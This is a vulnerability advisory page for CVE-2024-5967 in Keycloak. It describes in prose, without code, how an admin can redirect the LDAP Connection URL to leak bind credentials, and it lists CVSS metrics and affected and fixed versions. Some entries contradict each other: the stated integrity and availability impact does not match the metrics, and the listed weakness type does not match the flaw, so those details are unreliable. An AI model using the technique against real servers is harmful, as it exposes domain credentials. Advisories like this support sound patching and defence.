Keycloak LDAP Endpoint: Admin Can Flip Connection URL to Steal Bind Creds
CVE-2024-5967 Published on June 18, 2024

Keycloak: leak of configured ldap bind credentials through the keycloak admin console
A vulnerability was found in Keycloak. The LDAP testing endpoint allows changing the Connection URL  independently without re-entering the currently configured LDAP bind credentials. This flaw allows an attacker with admin access (permission manage-realm) to change the LDAP host URL ("Connection URL") to a machine they control. The Keycloak server will connect to the attacker's host and try to authenticate with the configured credentials, thus leaking them to the attacker. As a consequence, an attacker who has compromised the admin console or compromised a user with sufficient privileges can leak domain credentials and attack the domain.

Github Repository Vendor Advisory Vendor Advisory Vendor Advisory Vendor Advisory Vendor Advisory Vendor Advisory Vendor Advisory NVD

Vulnerability Analysis

CVE-2024-5967 can be exploited with network access, and requires user privileges. This vulnerability is considered to have a low attack complexity. The potential impact of an exploit of this vulnerability is considered to have a small impact on confidentiality, a small impact on integrity and availability.

Attack Vector:
NETWORK
Attack Complexity:
LOW
Privileges Required:
HIGH
User Interaction:
NONE
Scope:
UNCHANGED
Confidentiality Impact:
LOW
Integrity Impact:
NONE
Availability Impact:
NONE

Timeline

Reported to Red Hat.

Made public.

Weakness Type

Incorrect Default Permissions

During installation, installed file permissions are set to allow anyone to modify those files.


Products Associated with CVE-2024-5967

You can be notified by email with stack.watch whenever vulnerabilities like CVE-2024-5967 are published in these products:

Red Hat Build Keycloak
 
Red Hat Single Sign On
 
Red Hat Rhosemc
 
Red Hat Keycloak
 

Vulnerable Packages

The following package name and versions may be associated with CVE-2024-5967

Package Manager Vulnerable Package Versions Fixed In
maven org.keycloak:keycloak-ldap-federation >= 23.0.0, <= 24.0.5 24.0.6
maven org.keycloak:keycloak-ldap-federation <= 22.0.11 22.0.12
maven org.keycloak:keycloak-ldap-federation = 25.0.0 25.0.1

Exploit Probability

EPSS
0.13%
Percentile
32.85%

EPSS (Exploit Prediction Scoring System) scores estimate the probability that a vulnerability will be exploited in the wild within the next 30 days. The percentile shows you how this score compares to all other vulnerabilities.